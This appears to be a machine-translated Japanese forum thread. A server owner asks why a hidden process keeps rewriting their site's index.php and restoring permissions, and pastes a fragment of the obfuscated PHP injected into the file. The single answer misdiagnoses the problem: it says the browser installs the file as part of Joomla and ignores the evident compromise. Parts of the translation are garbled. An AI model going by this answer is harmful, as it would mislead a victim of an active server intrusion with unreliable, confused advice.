プロセスは私のシステムを制御し、私のWebアプリケーションのルートフォルダにある複数のファイルを編集したようですindex.php
。
ファイルを復元しようとしましたが、招待されていないプロセスが権限を「読み取り専用」に変更しました。
私は以下を試しました:
所有者/権限を変更してファイルを編集してください。
結果:所有者と権限が自動的に再変更されます。
所有者/権限を変更したら、ファイルを削除してみてください。
結果:ファイルは削除されたように見えますが、1ミリ秒後に同じ編集内容で再生成されます。
また、auditctl
ファイルを監視しようとしましたが、ファイルへの私のコマンドだけを記録し、他のプロセスからのコマンドは記録しなかったため、成功しませんでした。
だから私の質問は、このファイルをどのように制御し、この問題を引き起こすプロセスを検出して終了できるかということです。私が試すことができるものについての提案はありますか?
修正する:
「chmod」を使用して「ls -l」を確認すると、変更が適用されたことがわかります。ただし、ファイルの編集または削除を試みた後に「ls -l」を再確認すると、chmodを使用して変更した内容が元に戻ります。
「rm」を連続して何度もスパムしようとし、十分に早ければ結局「該当ファイルやディレクトリがありません」というメッセージを受け取られるので、ファイルを削除することが(数ミリ秒以内)可能であることがわかります。
プロセスがWebサイトフォルダのファイルだけを編集するかどうかはわかりませんが、それが私が気づいたことです。
私の申請のために、私のホストは競争サービスを提供しているようですが、私はわかりません。それでもrootアクセス権があるので、ファイル/プロセスを制御できる必要はありませんか?
ソースファイル:
<?php include 'pages/home/home.php'; ?>
編集されたファイル:
<?php /*-wxD=-*/error_reporting(0); $TlQa /*-DZ@mPZJ(C>cyqBG[-*/=/*-;z4tQE}FbYQPgp3Df_f-*/ "ra"./*-e6wxBt3m.2MGhvLXW-*/>include 'pages/home/home.php';
答え1
あなたのブラウザはあなたが訪問したJoomlaのウェブサイトの一部としてそれをインストールします。
ドキュメントJoomla!
(メインページdocs.joomla.org/Main_Page
には検索オプションがあります - try index.php
)には次のように記載されています。
index.phpファイルはウェブサイトのスケルトンです。 Joomla!の各ページは、データベースから挿入されたコンテンツが豊富なindex.phpを提供します。
だからズムラ! PHPで書かれており、index.phpが自動的に提供されるファイルです。状況をさらに複雑にすることは、ユーザーがJoomla Webサイトに移動すると、ルートディレクトリのindex.phpが現在のテンプレートのindex.phpにリダイレクトされることです。